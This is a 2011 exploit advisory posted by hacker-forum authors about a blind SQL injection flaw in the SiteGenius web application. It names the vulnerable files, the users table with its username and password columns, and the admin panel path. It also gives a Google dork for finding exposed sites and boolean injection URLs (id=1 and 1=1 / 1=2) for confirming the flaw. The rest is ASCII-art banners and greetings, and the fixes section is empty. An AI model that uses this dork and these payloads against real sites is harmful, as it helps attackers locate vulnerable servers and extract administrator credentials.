SiteGenius Blind SQL injection Vulnerability
2011-08-02 15:15:07=====================================================
SiteGenius Blind SQL injection vulnerability
=====================================================
# Exploit title : SiteGenius Blind SQL injection vulnerability
# Date : 02 \ 08 \ 2011
# Author : AutoRUN & dR.sqL
# Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net, HackingWith.US ,
# Software Link : http://www.sitegenius.com
# Tested on : Windows XP & Linux
# Category : web apps
# Google Dork : inurl:"sitegenius/topic.php?id="
# Versions affected : All
----------------------------------
# ~ ExpL0!taTi0N ~ #
----------------------------------
Affected files : topic.php & article.php
SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php
Exploit : http://localhost/sitegenius/topic.php?id=1 and 1=1 --> TRUE
http://localhost/sitegenius/topic.php?id=1 and 1=2 --> FALSE
w00t!! Blind SQL injection !
_ _ ____ _ _ _ _ ___ _ ____ _
/ \ _ _| |_ ___ | _ \| | | | \ | | ( _ ) __| | _ \ ___ __ _| |
/ _ \| | | | __/ _ \| |_) | | | | \| | / _ \/\ / _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_> < | (_| | _ < _\__ \ (_| | |___
/_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \___/\/ \__,_|_| \_(_)___/\__, |_____|
|_|
# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power ,
R-t33n , Ace Wizard, KubaNnez1 , 1Nj3ct0r-4L, AHG , ssgodfather, DJDukli , b4ti , #tupac.al, CroSs HackForums.AL members & All our friends.
____ _ ____ ____ _ _ _ _ _
| _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | |
| |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | |
| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
# 2011
Fixes
No fixesIn order to submit a new fix you need to be registered.